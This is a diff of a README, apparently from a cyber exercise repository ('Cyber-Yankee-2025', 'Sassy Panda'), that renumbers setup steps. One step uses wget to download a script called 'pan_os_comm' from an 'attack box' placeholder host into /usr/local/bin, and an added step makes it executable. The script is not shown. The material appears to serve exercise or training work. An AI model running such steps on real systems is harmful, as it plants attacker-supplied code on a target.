Infinit3i/Cyber-Yankee-2025/Sassy Panda/README.md

 2. Next, import the `pan_os_comm` script from your attack machine, where it is being hosted via the web server.
    `wget -O /usr/local/bin/pan_os_comm http://<IP_of_your_attack_box>:<port>/pan_os_comm`

+3. Once created, run the following command: `chmod +x pan_os_comm`

-3. To ensure that the file has been successfully downloaded and is executable, run:
+4. To ensure that the file has been successfully downloaded and is executable, run:

 ```bash
 ls -l /usr/local/bin | grep pan_os